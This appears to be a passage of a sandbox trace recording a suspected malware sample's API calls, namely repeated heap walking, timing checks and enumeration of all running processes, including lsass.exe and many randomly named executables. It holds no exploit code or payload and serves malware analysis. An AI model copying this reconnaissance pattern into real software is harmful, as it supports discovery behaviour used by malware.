	[0084.468] Heap32Next (lphe=0x203f65c) returned 1
	[0084.523] GetTickCount () returned 0x28c58
	[0084.523] GetCurrentThreadId () returned 0x560
	[0084.523] Heap32Next (lphe=0x203f65c) returned 1
	[0084.538] GetTickCount () returned 0x28c67
	[0084.538] GetCurrentThreadId () returned 0x560
	[0084.538] Heap32Next (lphe=0x203f65c) returned 1
	[0084.795] GetTickCount () returned 0x28d71
	[0084.795] GetCurrentThreadId () returned 0x560
	[0084.795] Heap32Next (lphe=0x203f65c) returned 1
	[0084.811] GetTickCount () returned 0x28d80
	[0084.811] GetCurrentThreadId () returned 0x560
	[0084.811] Heap32Next (lphe=0x203f65c) returned 1
	[0084.881] GetTickCount () returned 0x28dbf
	[0084.881] GetCurrentThreadId () returned 0x560
	[0084.881] Heap32Next (lphe=0x203f65c) returned 1
	[0084.897] GetTickCount () returned 0x28dcf
	[0084.897] GetCurrentThreadId () returned 0x560
	[0084.898] Heap32Next (lphe=0x203f65c) returned 1
	[0084.988] GetTickCount () returned 0x28e2c
	[0084.988] GetCurrentThreadId () returned 0x560
	[0084.988] Heap32Next (lphe=0x203f65c) returned 1
	[0085.004] GetTickCount () returned 0x28e3c
	[0085.004] GetCurrentThreadId () returned 0x560
	[0085.004] Heap32Next (lphe=0x203f65c) returned 1
	[0085.123] GetTickCount () returned 0x28eb9
	[0085.123] GetCurrentThreadId () returned 0x560
	[0085.123] Heap32Next (lphe=0x203f65c) returned 1
	[0085.140] GetTickCount () returned 0x28ec9
	[0085.140] GetCurrentThreadId () returned 0x560
	[0085.140] Heap32Next (lphe=0x203f65c) returned 1
	[0085.441] GetTickCount () returned 0x28ff1
	[0085.441] Heap32ListNext (hSnapshot=0x74c, lphl=0x203fa60) returned 1
	[0085.442] GetTickCount () returned 0x28ff1
	[0085.442] GetTickCount () returned 0x28ff1
	[0085.442] Process32First (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0085.443] GetCurrentThreadId () returned 0x560
	[0085.443] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0085.444] GetTickCount () returned 0x28ff1
	[0085.444] GetCurrentThreadId () returned 0x560
	[0085.444] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0085.445] GetTickCount () returned 0x28ff1
	[0085.445] GetCurrentThreadId () returned 0x560
	[0085.445] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0085.445] GetTickCount () returned 0x28ff1
	[0085.445] GetCurrentThreadId () returned 0x560
	[0085.446] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0085.446] GetTickCount () returned 0x28ff1
	[0085.446] GetCurrentThreadId () returned 0x560
	[0085.446] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0085.447] GetTickCount () returned 0x28ff1
	[0085.447] GetCurrentThreadId () returned 0x560
	[0085.447] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0085.451] GetTickCount () returned 0x29001
	[0085.451] GetCurrentThreadId () returned 0x560
	[0085.451] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0085.452] GetTickCount () returned 0x29001
	[0085.452] GetCurrentThreadId () returned 0x560
	[0085.452] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0085.453] GetTickCount () returned 0x29001
	[0085.453] GetCurrentThreadId () returned 0x560
	[0085.453] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.454] GetTickCount () returned 0x29001
	[0085.454] GetCurrentThreadId () returned 0x560
	[0085.454] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.454] GetTickCount () returned 0x29001
	[0085.454] GetCurrentThreadId () returned 0x560
	[0085.455] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0085.455] GetTickCount () returned 0x29001
	[0085.455] GetCurrentThreadId () returned 0x560
	[0085.455] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.456] GetTickCount () returned 0x29001
	[0085.456] GetCurrentThreadId () returned 0x560
	[0085.456] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.457] GetTickCount () returned 0x29001
	[0085.457] GetCurrentThreadId () returned 0x560
	[0085.457] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.458] GetTickCount () returned 0x29001
	[0085.458] GetCurrentThreadId () returned 0x560
	[0085.458] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.459] GetTickCount () returned 0x29001
	[0085.459] GetCurrentThreadId () returned 0x560
	[0085.459] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.459] GetTickCount () returned 0x29001
	[0085.459] GetCurrentThreadId () returned 0x560
	[0085.460] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.460] GetTickCount () returned 0x29001
	[0085.460] GetCurrentThreadId () returned 0x560
	[0085.460] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.461] GetTickCount () returned 0x29001
	[0085.461] GetCurrentThreadId () returned 0x560
	[0085.461] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0085.462] GetTickCount () returned 0x29001
	[0085.462] GetCurrentThreadId () returned 0x560
	[0085.462] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1
	[0085.463] GetTickCount () returned 0x29001
	[0085.463] GetCurrentThreadId () returned 0x560
	[0085.463] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.464] GetTickCount () returned 0x29001
	[0085.464] GetCurrentThreadId () returned 0x560
	[0085.464] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x650, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1
	[0085.464] GetTickCount () returned 0x29001
	[0085.464] GetCurrentThreadId () returned 0x560
	[0085.465] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1
	[0085.465] GetTickCount () returned 0x29001
	[0085.465] GetCurrentThreadId () returned 0x560
	[0085.465] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.466] GetTickCount () returned 0x29001
	[0085.466] GetCurrentThreadId () returned 0x560
	[0085.466] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1
	[0085.467] GetTickCount () returned 0x29011
	[0085.467] GetCurrentThreadId () returned 0x560
	[0085.467] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0085.468] GetTickCount () returned 0x29011
	[0085.468] GetCurrentThreadId () returned 0x560
	[0085.468] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0085.469] GetTickCount () returned 0x29011
	[0085.469] GetCurrentThreadId () returned 0x560
	[0085.469] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1
	[0085.470] GetTickCount () returned 0x29011
	[0085.470] GetCurrentThreadId () returned 0x560
	[0085.470] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1
	[0085.470] GetTickCount () returned 0x29011
	[0085.470] GetCurrentThreadId () returned 0x560
	[0085.470] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0085.471] GetTickCount () returned 0x29011
	[0085.471] GetCurrentThreadId () returned 0x560
	[0085.471] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0085.472] GetTickCount () returned 0x29011
	[0085.472] GetCurrentThreadId () returned 0x560
	[0085.472] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0085.473] GetTickCount () returned 0x29011
	[0085.473] GetCurrentThreadId () returned 0x560
	[0085.473] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.474] GetTickCount () returned 0x29011
	[0085.474] GetCurrentThreadId () returned 0x560
	[0085.474] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1
	[0085.475] GetTickCount () returned 0x29011
	[0085.475] GetCurrentThreadId () returned 0x560
	[0085.475] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1
	[0085.618] GetTickCount () returned 0x2909d
	[0085.618] GetCurrentThreadId () returned 0x560
	[0085.618] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="develop-patent.exe")) returned 1
	[0085.619] GetTickCount () returned 0x2909d
	[0085.619] GetCurrentThreadId () returned 0x560
	[0085.619] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xea4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="its.exe")) returned 1
	[0085.620] GetTickCount () returned 0x2909d
	[0085.620] GetCurrentThreadId () returned 0x560
	[0085.620] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gently budapest.exe")) returned 1
	[0085.620] GetTickCount () returned 0x2909d
	[0085.621] GetCurrentThreadId () returned 0x560
	[0085.621] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thoroughlypriestprefix.exe")) returned 1
	[0085.621] GetTickCount () returned 0x2909d
	[0085.621] GetCurrentThreadId () returned 0x560
	[0085.621] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inserted_field.exe")) returned 1
	[0085.622] GetTickCount () returned 0x2909d
	[0085.622] GetCurrentThreadId () returned 0x560
	[0085.622] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="semi bay.exe")) returned 1
	[0085.623] GetTickCount () returned 0x290ad
	[0085.623] GetCurrentThreadId () returned 0x560
	[0085.623] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outdoor.exe")) returned 1
	[0085.624] GetTickCount () returned 0x290ad
	[0085.624] GetCurrentThreadId () returned 0x560
	[0085.624] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wool-parish-horses.exe")) returned 1
	[0085.625] GetTickCount () returned 0x290ad
	[0085.625] GetCurrentThreadId () returned 0x560
	[0085.625] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoken-delayed.exe")) returned 1
	[0085.625] GetTickCount () returned 0x290ad
	[0085.625] GetCurrentThreadId () returned 0x560
	[0085.626] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spokesman.exe")) returned 1
	[0085.626] GetTickCount () returned 0x290ad
	[0085.626] GetCurrentThreadId () returned 0x560
	[0085.626] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="oxide.exe")) returned 1
	[0085.627] GetTickCount () returned 0x290ad
	[0085.627] GetCurrentThreadId () returned 0x560
	[0085.627] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="off-covered-playlist.exe")) returned 1
	[0085.628] GetTickCount () returned 0x290ad
	[0085.628] GetCurrentThreadId () returned 0x560
	[0085.628] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bryant.exe")) returned 1
	[0085.629] GetTickCount () returned 0x290ad
	[0085.629] GetCurrentThreadId () returned 0x560
	[0085.629] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="postal-fool.exe")) returned 1
	[0085.630] GetTickCount () returned 0x290ad
	[0085.630] GetCurrentThreadId () returned 0x560
	[0085.630] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crm_remarks_ctrl.exe")) returned 1
	[0085.630] GetTickCount () returned 0x290ad
	[0085.630] GetCurrentThreadId () returned 0x560
	[0085.631] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="volunteer.exe")) returned 1
	[0085.631] GetTickCount () returned 0x290ad
	[0085.631] GetCurrentThreadId () returned 0x560
	[0085.631] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ranger_tu_community.exe")) returned 1
	[0085.632] GetTickCount () returned 0x290ad
	[0085.632] GetCurrentThreadId () returned 0x560
	[0085.632] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eddie_cholesterol_reprint.exe")) returned 1
	[0085.633] GetTickCount () returned 0x290ad
	[0085.633] GetCurrentThreadId () returned 0x560
	[0085.633] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bracket-natural-chancellor.exe")) returned 1
	[0085.634] GetTickCount () returned 0x290ad
	[0085.634] GetCurrentThreadId () returned 0x560
	[0085.634] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="safari.exe")) returned 1
	[0085.634] GetTickCount () returned 0x290ad
	[0085.635] GetCurrentThreadId () returned 0x560
	[0085.635] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0085.635] GetTickCount () returned 0x290ad
	[0085.635] GetCurrentThreadId () returned 0x560
	[0085.636] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xff8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 1
	[0085.636] GetTickCount () returned 0x290ad
	[0085.636] GetCurrentThreadId () returned 0x560
	[0085.636] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0085.637] GetTickCount () returned 0x290ad
	[0085.637] GetCurrentThreadId () returned 0x560
	[0085.637] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0xdb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 1
	[0085.638] GetTickCount () returned 0x290ad
	[0085.638] GetCurrentThreadId () returned 0x560
	[0085.638] Process32Next (in: hSnapshot=0x74c, lppe=0x203f8f8 | out: lppe=0x203f8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0085.639] GetTickCount () returned 0x290bd
	[0085.639] GetCurrentThreadId () returned 0x560
